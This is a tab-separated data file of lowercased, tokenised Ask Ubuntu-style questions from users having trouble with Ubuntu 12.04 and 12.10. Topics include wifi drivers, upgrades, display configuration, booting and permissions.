202688	wifi does n't work under quantal	so , i was just installing the wifi on my quantal install and what i got is this : unpacking replacement bcmwl-kernel-source ... setting up bcmwl-kernel-source ( 5.100.82.112+bdcom-0ubuntu3 ) ... loading new bcmwl-5.100.82.112+bdcom dkms files ... building only for 3.5.0-17-generic building for architecture x86_64 module build for the currently running kernel was skipped since the kernel source for this kernel does not seem to be installed . error : module b43 does not exist in /proc/modules error : module b43legacy does not exist in /proc/modules error : module ssb does not exist in /proc/modules error : module bcm43xx does not exist in /proc/modules error : module brcm80211 does not exist in /proc/modules error : module brcmfmac does not exist in /proc/modules error : module brcmsmac does not exist in /proc/modules error : module bcma does not exist in /proc/modules fatal : module wl not found . update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... in 11.10 and 12.04 the installation of the `` bcmwl-kernel-source '' worked like a charm and i had wifi , but on 12.10 that 's ( sadly ) not the case . anyone feeling like giving me a hand ? : ) needless to say i will provide any additional info if needed : )
202689	how to connect to my own wifi using broadcom sta drivers ?	i 'm trying hard to switch to linux from windows because of my engineering project . unfortunately , everything is against that change ! before i have installed broadcom sta proprietary drivers , i was seeing on networkmanager and nm-applet only local radio-internet-access networks . after i installed broadcom sta , i see my neighbor 's wireless network ( channel 11 , wep ) neither before nor after the installation is own wireless network available . computer : asus lamborghini vx6 ubuntu : 12.04 lts 64-bit router : asus n55u ( a1 ) with newest asuswrt firmware network : channel 5 ( tried also 10 and 11 , both on 20 and 40mhz bands ) , wpa2 personal , 2,4 + 5 ghz ( what is not very important , 'cause the wlan card in vx6 is only 2,4ghz ) . network works fine on windows , also through d-link repeater on the other floor . unfortunately , same network is invisible to ubuntu on same machine . i have tried some combinations with other guis but it did not work . are there any better drivers for ubuntu ? i need that network badly , but i 'm an ubuntu newbie , so i do n't know how to solve that problem . please help .
202694	upgrade from 12.04 to 12.10 using the desktop image	i downloaded the ubuntu 12.10 desktop iso using bittorrent ( because it 's faster ) here . this time i 'm stuck because there is n't an alternate install with a cdromupgrade script and i 'm not really sure how to use apt-cdrom either . is there any way to use this image to upgrade my current installation without re-downloading everything ?
202695	no facility exists in update manager to upgrade to a new version , why ?	i am trying to upgrade to a new ubuntu version but the update manager does not recognize an update . why not ?
202697	where is the source code for alternate cd installer ?	afaiu debian-installer currently contains only documentation , where is the actual code for the alternate cd installer ?
202700	dell vostro 2420 upgrade to 12.04.1 no wifi	i have installed 12.04 on a dell vostro 2420 ( previously 11.10 ) and wifi is gone now but wired network remains . i 've reviewed the other questions and tried some stuff but no luck yet . the following is the process so far so hopefully someone can help : after installing 12.04 using the additional drivers utility did not bring up any proprietary drivers and using synaptic on installation then reinstallation of bcmwl-kernel-source and b43-fwcutter does not help bring up any drivers either ( tried rebooting after as well ) i have made sure in the bios that the wlan is turned on , and it appears the laptop does not have a wireless hardware switch , only the keyboard function shortcut which turns bluetooth on and off on the taskbar but there is no lightup of the wireless function on the laptop itself . dell does not appear to have any drivers for ubuntu and google does not appear to be much help : ( thanks in advance !
202702	12.10 quantal display issues using nvidiaxineramainfooverride	after updating to 12.10 today , my xorg.conf does n't seem to be respected by quantal . not sure if this is a 'bug ' or whether it 's just an adjustment i have to make due to changes in the os . when logging in , it seems ubuntu is now recognizing only one 3840x1080 screen named `` matrox '' and maximizing windows spans them across both screens . in 12.04 , this configuration file successfully allowed me to override the data provided by my triplehead2go and maximize windows to a single monitor . any ideas or where to start on trying to debug this ? after a bit of searching , i tried to make changes according to the update here : http : //www.phoronix.com/scan.php ? page=news_item & px=mteymdk here 's where the config file sits currently : section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` matrox '' horizsync 31.5 - 80.0 vertrefresh 59.9 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 260m '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` nvidiaxineramainfo '' `` true '' option `` nvidiaxineramainfoorder '' `` crt-0 '' # option `` metamodes '' `` crt : nvidia-auto-select +0+0 '' option `` nvidiaxineramainfooverride '' `` 1920x1080 +0+0 , 1920x1080 +1920+0 '' option `` stereo '' `` 0 '' subsection `` display '' depth 24 endsubsection endsection
202707	my update manager wo n't upgrade to 12.10 from 12.04	i followed the steps as shown on the ubuntu website , but when i clicked on `` check '' the upgrade did not appear ? is there something i am doing wrong , or is it just not working ?
202714	why is n't empathy notifications any longer accessible via hud in 12.10 ?	in ubuntu 12.04 , if someone contacted me via empathy , i could write their name and open a chat window via hud . this seems to have been disabled . people appear in the notification dropdown menu , but if i write their names , no relevant results appear . have i somehow tampered with the system , or has it in fact been disabled in 12.10 ?
202717	internet issues after upgrading to ubuntu 12.10	i upgraded to ubuntu 12.10 using update manager . after the upgrade , the wifi gets connected but would not display any webpages . if i ping 8.8.8.8 or google.com , there is response . i managed to fix this problem by using the command sudo dhclient wlan0 . but , now the problem is that every time i switch wireless networks , i have to give that command . how do i make this permanent ?
202718	unity gwibber lens does n't work 12.10	is there something specific i am needing to do to get the unity gwibber/social lens to work . i have gone into system settings and added google account , twitter account and facebook account . when i go to the lens however nothing is displayed at all its blank . i search any term including my name and it states nothing to display . so it remains blank . if i start gwibber itself it has found and does see my accounts new messages and posts . any hints on what to try ?
202721	where is my ram ?	i have 2gb installed on my machine running ubuntu 12.04 . after some time of use , i see much of my ram used . the ram does not free enough even though i closed all my programs . i included 2 screenshots . first is `` gnome system monitor '' ( all process ) and second is `` htop '' ( with sudo ) , both sorted by memory usage . from both you see , that it 's not possible that all running apps takes together 1gb of memory . first 7 biggest programs sum 250 , but others are much smaller ( all ca n't sum even 100mb ) . the cache is 300mb ( yellow ||| on htop ) and is not included in 1gb used . also 260mb is already on swap . ( which actually makes 1,3gb of used memory ) if i start firefox ( or chrome ) with many tabs , it has only 1gb available and not potentially 1,5 gb ( assume 0,5gb is for system ) . when i need more ram , swapping happens . so where is my ram ? which program is using it ? how can i free it , to be available for e.g . firefox ? gnome system monitor htop
202723	ubuntu 12.10 ca n't find java , but it 's exists !	i installed zendstudio 5.5.1 on ubuntu 12.04 and it runs well , no problem . today , i download ubuntu 12.10 and intalled it on my / but keep the /home partition . and now , i ca n't run the zendstudio any more , it gives me this error : strings : '/lib/libc.so.6 ' : no such file ./zde : 1714 : exec : /home/william/zend/zendstudio-5.5.1/jre/bin/java : not found but the java file exist ! what 's wrong ? thanks ! i fixed the problem , it 's because i am using 64bit os and after i run sudo apt-get install libxss1 lib32stdc++6 lib32asound2 ia32-libs libc6-i386 lib32gcc1 the zend studio 5.5.1 can run now .
202726	is there an official torrent for 12.10 ?	i like using torrents for many reasons : faster downloads , and i want to be able to give back , reducing load on canonical 's servers . is there an official torrent for ubuntu 12.10 ?
202727	still need discard , noatime , and data=ordered for ssds ?	it 's just been a while . did n't know if ssds are auto-detected , or if it 's still necessary to use the discard , noatime , and data=ordered mount options .
202730	how to fix the `` unable to calculate upgrade '' issue when upgrading from 12.04 to 12.10 ?	i 've been trying to upgrade to 12.10 ever since it was released today but i keep meeting this error : '' an unresolvable problem occurred while calculating the upgrade : e : unable to correct problems , you have held broken packages . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu '' i 've tried updating all the currently installed software , removing all the extra ppas , downgrading the files installed from xorg edgers ' ppa but i have n't been able to solve the problem .
202733	option button in keyboard layout > input sources is not pressable	i would like to set the caps-lock key as a compose key , which you do , as far as i remember , by pressing the options button in keyboard layout > input sources and then enabling the appropriate option there . that button is not pressable though since i switched to 12.10 . it did work in previous releases of ubuntu . gnome-control-center puts out these errors , when i click on keyboard layout : ( gnome-control-center:3645 ) : common-cc-panel-warning ** : could not find current language 'đ\u0003c ! \u007f ' in the treeview ( gnome-control-center:3645 ) : common-cc-panel-warning ** : locale ' '' en_us.utf-8 '' ' is n't valid i 'm not sure if the errors are related though , maybe they are related to the `` interface switching to chinese bug '' which seems surprisingly widespread : language changed to chinese , how do i change it back ? language support has an unwanted chinese language option nautilus folders turned chinese desktop 12.04 gnome/cairo suddenly in chinese unwanted chinese language got set in system settings i can not set my system back to english from chinese language gnome-classic language turned into chinese , how do i change it back to english ? strange display language in gnome shell i 'm not sure they are related to this bug , but i just wanted to mention it , maybe it helps !
202737	my old files are lost ?	i used to have windows xp in my computer . when i was trying ubuntu 12.04 i was able to see the old files , but when i installed ubuntu i ca n't found them anymore . any clues ? the disk utility shows my disk with 4 partitions : /dev/sda1 107 gb ext 4 file system linux ox83 bootable not mounted /dev/sda2 53 gb container for logical partitions /dev/sda6 51 gb ext 4 file system ext 4 ( version 1.0 ) /dev/sda5 2.7 gb swap space
202740	ubuntu 12.10 torrent trackers down for you ?	are the ubuntu 12.10 torrent trackers down for you ? http : //torrent.ubuntu.com:6969/announce http : //ipv6.torrent.ubuntu.com:6969/announce their status for me is : not working i am using qbittorrent 3.0.6
202742	suddenly can not ssh into server from lan , but can from outside lan ?	this is the weirdest problem i 've ever had with trying to ssh into a server . suddenly i ca n't ssh from my workstation to the server on the lan . i can do so just fine from home , however . /var/log/auth.log is n't helpful , even with sshd logging set to verbose : oct 18 17:08:35 servername sshd [ 4171 ] : refused connect from 192.168.0.7 ( 192.168.0.7 ) the ssh -v output does n't provide any helpful information either : username @ 192.168.0.7 : /home/username $ ssh -v username @ 192.168.0.30 -p # # # # openssh_5.3p1 debian-3ubuntu7 , openssl 0.9.8k 25 mar 2009 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug1 : connecting to 192.168.0.30 [ 192.168.0.30 ] port # # # # . debug1 : connection established . debug1 : permanently_set_uid : 0/0 debug1 : identity file /root/.ssh/identity type -1 debug1 : identity file /root/.ssh/id_rsa type -1 debug1 : identity file /root/.ssh/id_dsa type -1 ssh_exchange_identification : connection closed by remote host i do n't have fail2ban running , and iptables does n't show any funky rules . anyone have any ideas or futher debugging tips ?
202752	unity top bar , side bar , and window decorations missing after upgrade to 12.10	i upgraded from 12.04.1 to 12.10 via the update manager and the upgrade said it completed successfully , however after rebooting the unity task bar was missing along with the launch bar and the window decorations . all compiz settings seemed to be purge deleted , and at first boot it gave me a system error . the desktop exists , and once i remember i messed up the compiz settings and just had to press ctrl+alt+f1 and in the virtual terminal type unity -- reset then sudo reboot . everything worked as if i reinstalled the entire operating system . this time it said : warning no variable set . setting to :0 . the reset option is now dupricated . what am i suppose to do now ? i need this fixed as soon as possible because i need a couple of certainly installed programs and the data within them ( long story short ) .
202753	bug report whilte upgrading from 12.04 , is this a real problem ?	could not install /var/cache/apt/archives/libdrm2_2.4.39-0ubuntu1_amd64.deb the upgrade will continue but the /var/cache/apt/archives/libdrm2_2.4.39-0ubuntu1_amd64.deb package may not be in a working state . please consider submitting a bug report about it .
202754	deb installer - dependency checks	using a third-party install generation tool , i created a .deb package for my application . there are several dependencies that are required to be present on user’s linux os for my application to run properly . specifically , “make” , and several “.so” libraries , like libgcc.so , libc.so etc . not all of our ubuntu users may have required dependencies installed prior to running my package installer . this third-party installer tool that i used , generates deb package , but does not include dependency checks . as members of the ubuntu community , could you please comment on how a custom .deb package without dependency checks may be received by linux-ubuntu users ? is it acceptable enough to deliver .deb for a custom application that does not check dependencies ? or is it uncommon enough to ‘anger’ linux users ?
202764	plymouth not showing after upgrading to ubuntu 12.10	after i upgraded to ubuntu 12.10 today , the plymouth splash screen is not showing when i startup my computer . the screen goes purple at first , then goes black and i am shown the login screen . it showed up when the computer shuts down , though . is there a way to make plymouth show again ?
202765	how to install a canon ip4900 on ubuntu precise	i have installed printers on many versions of ubuntu since breezy badger with no problem . some weeks ago i installed a new pixma 4900 in the usual manner , it printed a test file and has not worked since . i installed the latest gutenprint and cups and have been beating my head against the wall trying to get this thing configured . can you please provide a sample default file using the latest cupsd , cnf file . i ca n't even get into local host . thank you
202766	only one resolution available in xorg.conf	i recently upgraded to ubuntu 12.10 and when i try to change my resolution in nvidia x server settings , i only get the native one ( 1600x900 ) . when i had 12.04 installed , all resolutions were available in the drop down list . my goal is to have twinview working again . i used to set my two screens to twinview and clones , using my hdtv resolution ( 1360x768 ) which was previously available in 12.04 for my laptop screen too . in 12.10 , i tried to install all of the nvidia drivers available except the nouveau driver . i tried to add a new mode using xrandr -- newmode / -- addmode , but it did n't work ; it coud n't detect my output . i 'd like to know if this is a known bug and if there 's something to do with that . thanks !
202769	why does upgrade from 12.04 to 12.10 using a cd/dvd still require download ?	when i attempted to upgrade from 12.04 to 12.10 , there was no autorun feature for the upgrade . so i went into update manager , settings , and clicked `` add volume '' and it added the dvd i had downloaded and burned . however , during the upgrade it says `` 1,164m to download '' . how can this be true ? i have almost all the packages on the dvd . is there something additionally i should do to avoid downloading ?
202772	ubuntu 12.10 x64 installer freezes after stage `` preparing ''	when pressing `` continue '' after the installer has checked hd-space , internet-connectivity and power , the `` continue '' button grays out and mouse pointer turns into some round spinning thing , but nothing happens after that . i 've tried with lan-cable connected , lan-cable disconnected , wireless connected and wireless disconnected . what should i do ? installing 12.04 on the same machine was trouble free . this only occurs on single processor systems , or when booting on a dual processor system with `` nosmp '' or `` maxcpus=1 '' in the kernel parameters .
202773	using intel 's pin tool on ubuntu ?	i 'd like to use intel 's pin tool on ubuntu 12.04 and having trouble installing it . i downloaded pin for linux 64bit from here http : //www.pintool.org/ , extracted the package and compiled the examples in source/tools/.. how do i run pin now ? tried : pin pin.sh ./pin etc , none seemed to work : ( do i need to install any extra libraries or ... ? thanks !
202775	trackpoint not detected thinkpad x130e	i just did a fresh install of 12.10 and now only my touchpad works . the trackpoint and left/right buttons below the trackpoint do not work . the trackpoint worked fine as of 12.04 . i 've searched online and there was a hack that said that disabling the touchpad would enable the trackpoint . wrong ! you 'll end up having to use the keyboard =/ . i do n't know what is needed so i 'll just dump some stuff . lspci : 00:00.0 host bridge : advanced micro devices [ amd ] family 14h processor root complex 00:01.0 vga compatible controller : advanced micro devices [ amd ] nee ati wrestler [ radeon hd 6310 ] 00:01.1 audio device : advanced micro devices [ amd ] nee ati wrestler hdmi audio [ radeon hd 6250/6310 ] 00:05.0 pci bridge : advanced micro devices [ amd ] family 14h processor root port 00:06.0 pci bridge : advanced micro devices [ amd ] family 14h processor root port 00:07.0 pci bridge : advanced micro devices [ amd ] family 14h processor root port 00:11.0 sata controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices [ amd ] nee ati sbx00 smbus controller ( rev 42 ) 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge ( rev 40 ) 00:18.0 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 0 ( rev 43 ) 00:18.1 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 1 00:18.2 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 2 00:18.3 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 3 00:18.4 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 4 00:18.5 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 6 00:18.6 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 5 00:18.7 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 7 01:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) 02:00.0 ethernet controller : atheros communications inc. ar8151 v2.0 gigabit ethernet ( rev c0 ) i 've installged gpointing-device-setting and it only lists the touchpad . no trackpoint . what should i do ? what data do you need ?
202777	when upgrading from 12.04 to 12.10 , after rebooting , ubuntu wo n't load when selected from boot menu	i just upgraded ubuntu 12.04 to 12.10 . i followed the upgrade instructions on ubuntu 's website , and followed all onscreen instructions . my problem is , when i select ubuntu from the boot menu , it gives me a screen that says at the top : '' grub4dos 0.4.5b 2011-11-27 , mem : 639k/1010m/0m , end : 3554c0 [ minimal bash-like line editing is supported . for the first wors , tab lists possible command completions . anywhere else tab lists the possible completions of a device/filename . ] grub > '' how do i go about booting ubuntu from this screen ?
202781	how do i efi boot zenbook prime ux31a from built-in card reader ?	how do i efi boot zenbook prime ux31a from built-in card reader ? ubuntu live 12.10 64bit has been copied onto an a sd card which i 'm trying to boot from . when i power on my zenbook and press esc for the boot menu , the sd card is n't listed as an option . the only device in the list is the internal sdd drive . there is an `` add boot option '' in the bios but it requires a few a things that i 'm not quite sure of . add boot option - i guess any identifier works here . i 've been entering ubuntu . select filesystem - the only option available is pci ( 1f|2 ) \devicepath ( type 3 , subtype 12 ) hd ( part1 , sig787e6287-xxxx-xxxx-xxxx-xxxxxxxxxxxx ) path for boot option - i 've been entering ubuntu : \efi\boot\bootx64.efi then i select create and the new boot option appears in the boot menu but the newly created boot option still points to the internal sdd .
202786	how do i determine which hdd the system was booted from when using uefi ?	in a system with x identically partitioned hdd 's each drive has a uefi boot partition with the bootable flag set . during power on i 'm able to select any of the hdd 's to boot from using uefi . once ubuntu has started . how do i determine which hdd the system was booted from ? an incorrect answer is : the one containing the partition mounted at /boot/efi . it is incorrect as that is written to /etc/fstab when installing ubuntu . it 's not dynamic and does not point to the uefi partition i actually used to boot .
202788	how can i enable ubuntu one indicator ?	how can i enable ubuntu one indicator in 12.10 ? i installed the package : indicator-sync but in vain . rebooting the computer does not help . command : aptitude search ubuntuone p desktopcouch-ubuntuone - ubuntu one connection extension for desktop couchdb i gir1.2-ubuntuoneui-3.0 - ubuntu one widget library p gir1.2-ubuntuoneui-3.0 : i386 - ubuntu one widget library i libubuntuoneui-3.0-1 - ubuntu one widget library p libubuntuoneui-3.0-1 : i386 - ubuntu one widget library p libubuntuoneui-dev - ubuntu one widget library p libubuntuoneui-dev : i386 - ubuntu one widget library i python-ubuntuone-client - ubuntu one client python libraries i python-ubuntuone-control-panel - ubuntu one control panel - python libraries p python-ubuntuone-devtools - ubuntu one development tools - python modules i python-ubuntuone-storageprotocol - python library for ubuntu one file storage and sharing service v python2.7-ubuntuone-client - v python2.7-ubuntuone-storageprotocol - i rhythmbox-ubuntuone - ubuntu one rhythmbox plugin i ubuntuone-client - ubuntu one client i ubuntuone-client-gnome - ubuntu one client gnome integration p ubuntuone-client-gnome : i386 - ubuntu one client gnome integration p ubuntuone-client-proxy - ubuntu one client proxy support i ubuntuone-control-panel - ubuntu one control panel v ubuntuone-control-panel-gui - i ubuntuone-control-panel-qt - ubuntu one control panel - qt frontend i ubuntuone-couch - ubuntu one couchdb p ubuntuone-dev-tools - ubuntu one development tools p ubuntuone-file-storage-api - ubuntu one file storage apis when i log in to my session , the indicator-sync-service is well running . yet there is no icon in top panel . sync and upload notifications appear normally and ubuntu one client is functioning correctly . i have several other indicators in my panel but i do n't see any probability that one of them is conflicting with ubuntu one indicator . 1 :
202789	cursor jumps when moving ( and some other times )	i updated to 12.10 beta 1 when it was released ( coming from 12.04 fresh install , i skipped the alpha releases of 12.10 ) since then i 've done all the usual updates but ive had an issue with my cursor jumping . it does not jump when typing , i 've done a lot of searching and cant find an answer , it tends to happen most when i move the cursor the jump is maybe 15-20 pixels down and to the right it seems like a display issue because if i hover over a link or the x to close a window the cursor will settle in it 's down/right position , but the whatever im hovering over will still act as if that 's where the mouse is , and clicking still works on the item . so the mouse is actually in its original location , but it 's displaying offset and flickering back and forth from its down/right position and its correct position this makes use very difficult because the mouse is never displayed where it actually is and i have to estimate my clicks any ideas ? clarity : the issue i have is on a full install , not virtual box .
202792	add-apt-repository missing from mini.iso	i downloaded the ubuntu 12.10 mini.iso today . my intentions were to install the razor-qt ppa . i found this here sudo apt-get install python-software-properties did not work . i ca n't locate the package .
202795	gm-notify back on messaging icon on ubuntu 12.10	i use gm-notify to receive notifications of when i receive an email . how do i get the messaging icon back on the panel to see how much emails i have ? ( curently using gm-notify and not using online accounts )
202796	what is the `` fontconfig '' folder in my home ? may i delete it ?	i just upgraded from ubuntu 12.04 to ubuntu 12.10 . in the process , a new folder appeared in my home directory , called `` fontconfig '' . it includes some 24 files with a `` .cache-3 '' extension . this happened on all my computers . what is this folder ? can i safely delete it ?
202800	how to create a common ext4 [ read / write ] partition with all ubuntu users ?	i have a shared ext4 drive with 777 permissions for all users to use . problem is : when a user creates a new folder / file , it gets 644 . i guess that is because of the umask for that user . now , i want to have all the new content with 777 . for that i do n't think editing the umask is good idea . then i tried the sticky bit , but in case of sticky bit only the user who created that file has the permission to delete the file . again undesired behavior . then i tried , to use acl permissions on that . but on gogoling i got to know that acl is not recursive , therefore the permissions would be lost on 2nd level directory . please suggest something.. i think i am out of ideas now ! the shared directory is for movies that all are allowed to add and delete . i do n't want to go for ntfs - i believe i can have this drive as ext4 with the permission problem solved . please help ! !
202801	how to show windows system reserved partition using ubuntu live dvd ?	all questions in this site ask how to `` hide '' ! i want to fix my boot ( fix mrb wont work , i have gpt disk ) by changing some files at windows system reserved . gparted shows the following partitions ( but nautilus does n't ) : **/dev/sda1 - file system : unknown - 128mb - flags : msftres** ( this one shows * '' warning : unable to detect file system ! possible reasons : -file system is damaged -file system is unknown to gparted -there is no file system available ( unformated -the device entry /dev/sda1 is missing ) '' * ) **/dev/sda2 - file system : fat32 -100mb - flags : boot** **/dev/sda3 - file system : ntfs - 500gb**
202802	how can i move window titles to the center of the title bar in 12.10 ?	by default the window titles are on the left side of the title bar . is there a way to center the titles ?
202809	triple boot windows , ubuntu , and mac os x ml on macbook pro ( 9,1 )	ubuntu 12.10 came out today , and ever since i got my macbook , i have n't really been able to try ubuntu again ( i got it in september and have been using ubuntu since 8.04 ) . i have mac os x mountain lion installed and windows 7 installed using bootcamp . i also have refit installed and both oses boot up fine ... now i just need to figure out how to install ubuntu with both oses being happy . because windows uses mbr there is n't really room for another partition . now there is a recovery partition starting with lion ... so efi + recovery + ml + windows = 4 partitions . has anyone had any success in triple booting ? i do n't want to virtualize , i want to use it natively . and i really do n't want to resort to wubi , it feels like i 'm cheating , and that 's a horrible solution for things .
202811	hp pavilion g4 2118tu drive	everyone . my hp pavilion g4 bought with suse linux os , but when i change it to ubuntu , i could n't find the drive softwave for linux ( hp-drive-guard - hp driveguard ; touch drive ... .. ) would you help me , please ?
202814	what is the easiest way to install new theme on 12.04	i want new look and feel on ubuntu 12.04 .
202815	files copied to a ntfs partition in ubuntu 12.04 missing	i had recently downloaded an .iso file in ubuntu . i decided to burn it in windows as i am well acquainted ( i am using an evaluation copy of windows 8 ) . so i copied it over to one of the ntfs partitions ( d : \ being the directory under windows ) . but when i booted into windows , i could not find the specified .iso file . booting back into ubuntu , i mounted the ntfs partition , but alas ! the file was gone from there too ! it was a fairly large .iso file and i do not want to download it all over again . please help me out .
202820	linux kernel not upgraded from 3.2.x to 3.5.x after ubuntu upgrade from 12.04 lts to 12.10 ( through 12.10 beta )	i had upgraded to ubuntu 12.10 beta from 12.04 lts . i kept updating every recommended update suggested by software updater . all updates were successful . yesterday , 12.10 stable is formally released and my software updater has applied all updates without any error/warning . but looks like my ubuntu has been not fully upgraded to 12.10 . for example the linux kernel is still in 3.2.x and not upgraded to 3.5.0 . ( screens attached ) . ps : spam prevention mechanism not allowing to attach images . just adding the commands : 08:21:25-~ ] lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal 08:49:56-~ ] uname -a linux nod-af1-lo-j005 3.2.0-25-generic-pae # 40-ubuntu smp wed may 23 22:11:24 utc 2012 i686 i686 i686 gnu/linux 08:49:59-~ ]
202823	pcâ slower after clean installing 12.10	i am running dual-boot on my pc . win7 and ubuntu 12.10 ( formerly was running 12.04 ) . i just did a clean install and got 12.10 . i am noticing that my system is running slower in 12.10 and that it was faster in 12.04 . also , when i open up the dashboard , the graphics get messed up and system freezes ( graphics also get messed up after resuming suspend mode ) . i tried to update nvidia through terminal but it wo n't update anything ... please help with these issues as i really just need to solve these issues in order for ubuntu to run perfectly on the system . thank you : )
202828	dash is slow and shows irrelevant results	i currently have the latest ubuntu 12.10 installed on my laptop . usually i use launchy application to have a quick access to any app/config/file etc . now i 'm trying to get used to dash , which is supposed to be default way to do such things in recent ubuntu versions . the difference between the usage of launchy and dash is following : launchy : alt+space - > launchy shell shown instantly - > type your request - > open the target dash : superkey - > period - > dash is shown - > type your request - > period - > navigate with arrow buttons between the results - > open the desired result another problem . when i type the term `` ryth '' ( which is incorrectly spelled part of `` rhythmbox '' ) what is shown in these 2 shells : launchy : 1 result , which is rhythmbox . the letters 'r ' , 'y ' , 't ' and 'h ' are highlighted . dash : 2 results , which are mp3s from amazon and are completely irrelevant to my request so is there any way to tweak the dash to allow me to use it as i use launchy with the same performance and results ?
202830	java mainserver gives java.lang.unsupportedclassversionerror : unsupported major.minor version 51.0	compiling is easy but when using java to run the programs , it gives exception found . i am using ubuntu 12.04 without internet connections . also , installed oracle jdk7 and jre7 . also did the update-alternatives command on java , javac and javaws . changed the machine java in /etc/profiles . path is pointing to oracle java folder . i did many searches on google about this topic but each time jdk and jre version are different . also check version of jdk and jre using java -version and javac - version . both of them are the same . the system also contains openjdk6 and openjdk7 . so , how do i remove these errors ? java runs small programs but when using rmi gives this error .
202837	making remotely connected ubuntu server as gui enabled	i am trying to connect to a remote server in cloud hosting service using remote desktop client application . actually , the remote server is a server edition . i need it as gui enabled like an ubuntu desktop edition so that it will be user friendly . so i have installed ubuntu-desktop using sudo apt-get install ubuntu-desktop . i 'm able to connect to the server via putty ssh client . in putty we can run in command line mode only . i want to run the server in gui mode . i ca n't access the server as gui enabled in remote desktop client . mine is ubuntu 12.04 lts . the remote server is also ubuntu 12.04 lts . what shall i do now ?
202841	slap me when i stop working	on mac os x i have an app that plays a sound when i enter certain sites . i want a similar software to use on linux . does anybody know one ?
202843	folder shown as executable	i copied the content of a usb stick in a folder into an ntfs drive , and everything seemed right ( the folder was accessible , etc. ) . but today , when i wanted to access this folder , the folder 's icon turned to an executable ( win ) icon , and i ca n't access it ( even using the terminal , the folder is recognized as a file ) . i ca n't see the file 's size or do anything with it . thank you in advance ! ( i hope i solve this in the commi
202844	when will the next lts version of lubuntu be released ?	12.04 was an lts for ubuntu but not for lubuntu , hence this query .
202846	window manager not working	when upgrading kubuntu from 12.04 to 12.10 i agreed to stop the kdm daemon and now i ca n't get any window manager to initialize . i do however still have my burg boot screen . so now how do i finish my install via shell scripting ?
202850	how do i screenshare over the internet using remmina desktop client ?	i want to screenshare my desktop with my cousin who lives out of town . what do i enter in the ip box to connect to his specific computer ? the traditional 192.168.x.xxx wo n't work of course..i 'm assuming i 'll have to use his isp ip with some type of string command to address his specific laptop.. ?
202851	12.10 64-bit install freezes on asus ux32vd	i have been struggling to install ubuntu on my shiny new asus ux32vd ( zenbook ) for a while . there were the usual set of problems with 12.04 ( suspend/resume , some keys not working , right mouse pad key not working ) so i switched to 12.10 beta . suspend/resume never worked with 12.10 either and nomodeset option needed to be specified for the boot loader but i waited patiently for the final release and updated the 12.10 beta daily . around october 8 , after an update the beta could not boot anymore , it froze at the ubuntu title page ( after all the 4 white dots turned to red ) . i continued updating the packages daily from the command prompt but i never managed to get the graphical environment to run again . i decided to wait for the release , thinking that i might have run into a beta release update problem . then yesterday the 12.10 release arrived and i am sad to declare that the release does exactly the same thing , booting from the cd . if i choose try ubuntu at boot time and specify nomodeset for the boot loader , the boot progresses until the ubuntu logo/four red dots then freezes . without nomodeset the screen stays black and nothing is displayed during boot . any idea , how to get ubuntu running on asus ux32vd ? it has a windows7 installation and that works fine .
202852	upgrade with backports installed	i am running ubuntu 12.04 with backports for texlive . ubuntu 12.10 is to contain the same version of texlive that backport provides currently to 12.04 . i , of course , want to move from backport to the normal version of texlive available in ubuntu 12.10 repositories . how do i handle the situation ? do i upgrade the normal way and everything will be taken care of i.e . my texlive installation will now be from repositories instead of backports ?
202855	how do i get a coffee mug/cup icon to my applets ?	i 've seen someone had a coffee cup on their taskbar , in their indicators , and was wondering how i can get it . i think it was something to do with java . also , how do i make my own applet , even if it 's just a picture ?
202857	ca n't install ati proprietary drivers in 12.10	i have a laptop with ati radeon 6770m hd hybrid graphics card . in ubuntu 12.04 , i installed the fglrx driver through `` additional drivers '' and it worked . ( i can even switch gpus ) . but in the new ubuntu 12.10 , after installing , unity wo n't load . only the mouse and the wallpaper . if i initialize the settings sudo aticonfig -- initial then after rebooting it gives a warning saying i 'm in low graphics mode ! how to fix this ? earlier i used software source to install the drivers . but when using the terminal , i got this warning : update-alternatives : warning : forcing reinstallation of alternative /usr/lib/fglrx/ld.so.conf because link group x86_64-linux-gnu_gl_conf is broken update : filed a bug report in launchpad : https : //bugs.launchpad.net/fglrx/+bug/1068661
